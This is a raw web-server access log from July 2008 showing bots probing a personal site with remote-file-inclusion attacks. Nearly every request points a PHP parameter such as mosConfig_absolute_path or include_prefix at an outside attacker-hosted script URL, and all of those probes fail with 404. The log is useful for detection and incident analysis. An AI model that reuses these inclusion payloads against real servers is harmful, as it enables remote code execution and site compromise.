82.194.66.40 - - [13/Jul/2008:17:37:04 -0700] "GET //index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
82.194.66.40 - - [13/Jul/2008:17:37:05 -0700] "GET /logs//index.php?option=com_content&task=view&id=47&Itemid=75//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:37:20 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:37:20 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:37:21 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:37:42 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:37:42 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:38:07 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:38:07 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
189.62.145.42 - - [13/Jul/2008:17:38:27 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
189.62.145.42 - - [13/Jul/2008:17:38:28 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
189.62.145.42 - - [13/Jul/2008:17:38:30 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:38:55 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:17:39:03 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:17:39:03 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:39:37 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:39:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:39:41 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.25.195.68 - - [13/Jul/2008:17:39:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ghanamailbox.com/simg/idosi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:39:48 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:39:49 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:17:39:52 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:17:39:52 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:40:06 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:40:18 -0700] "GET /logs/access_080211.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:40:19 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:40:38 -0700] "GET /logs/access.log/index.php?p=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:40:39 -0700] "GET /index.php?p=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:40:39 -0700] "GET /logs/index.php?p=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:17:41:20 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
58.227.193.211 - - [13/Jul/2008:17:41:21 -0700] "GET /index.php?incl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:42:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:42:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:42:14 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:43:05 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:43:05 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:43:32 -0700] "GET /logs//poll/booth.php?include_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:43:32 -0700] "GET //poll/booth.php?include_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:44:03 -0700] "GET //poll/booth.php?include_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:44:03 -0700] "GET /logs//poll/booth.php?include_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:45:48 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:45:48 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:45:49 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:46:14 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:46:15 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:46:20 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "neighborhoodglimpses.com"
70.85.102.132 - - [13/Jul/2008:17:46:20 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:46:50 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:46:50 -0700] "GET //ashnews.php?pathtoashnews=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:46:51 -0700] "GET /logs//ashnews.php?pathtoashnews=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:46:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:46:53 -0700] "GET //ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:46:53 -0700] "GET /logs//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:47:27 -0700] "GET /logs/access.log//errors.php?error=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:47:27 -0700] "GET //errors.php?error=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:47:28 -0700] "GET /logs//errors.php?error=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.6.17.177 - - [13/Jul/2008:17:48:08 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "neighborhoodglimpses.com"
189.62.145.42 - - [13/Jul/2008:17:48:16 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:48:17 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:48:17 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:48:50 -0700] "GET /logs/access_080211.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.151.102.50 - - [13/Jul/2008:17:48:50 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:49:04 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:49:04 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.69.192.170 - - [13/Jul/2008:17:49:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:49:07 -0700] "GET /logs/access.log//include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:49:08 -0700] "GET //include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.111.176.106 - - [13/Jul/2008:17:49:08 -0700] "GET /logs//include/write.php?dir=http://www.seekapeek.com/orca///log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:50:10 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:50:11 -0700] "GET //ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:50:11 -0700] "GET /logs//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:50:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:50:16 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:50:17 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:50:17 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:50:23 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:50:23 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:50:24 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:50:24 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:50:24 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:51:07 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
204.15.10.22 - - [13/Jul/2008:17:51:07 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
72.52.166.232 - - [13/Jul/2008:17:51:20 -0700] "GET /login.php?path_to_root=http://www.m-comp.nl/oscommerce/catalog/includes/local/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.neighborhoodglimpses.com"
72.52.166.232 - - [13/Jul/2008:17:51:20 -0700] "GET /logs/login.php?path_to_root=http://www.m-comp.nl/oscommerce/catalog/includes/local/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:17:51:25 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:17:51:26 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "neighborhoodglimpses.com"
205.234.252.183 - - [13/Jul/2008:17:51:45 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
205.234.252.183 - - [13/Jul/2008:17:51:45 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
205.234.252.183 - - [13/Jul/2008:17:51:45 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:52:06 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:52:07 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:52:08 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
69.72.172.10 - - [13/Jul/2008:17:52:08 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sergio.freesitespace.net/scripts/korn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.192.48.154 - - [13/Jul/2008:17:52:12 -0700] "GET /logs/access.log//main.php?sayfa=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
67.192.48.154 - - [13/Jul/2008:17:52:12 -0700] "GET //main.php?sayfa=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
67.192.48.154 - - [13/Jul/2008:17:52:12 -0700] "GET /logs//main.php?sayfa=http://www.m-comp.nl/oscommerce/catalog/includes/local/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
194.79.75.195 - - [13/Jul/2008:17:52:53 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:17:53:01 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.neighborhoodglimpses.com"
83.19.144.26 - - [13/Jul/2008:17:53:01 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:17:53:19 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:17:53:19 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:17:53:19 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:17:53:27 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:17:53:27 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "neighborhoodglimpses.com"
207.210.119.202 - - [13/Jul/2008:17:53:28 -0700] "GET /logs/access_080211.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "neighborhoodglimpses.com"
82.194.86.237 - - [13/Jul/2008:17:54:06 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
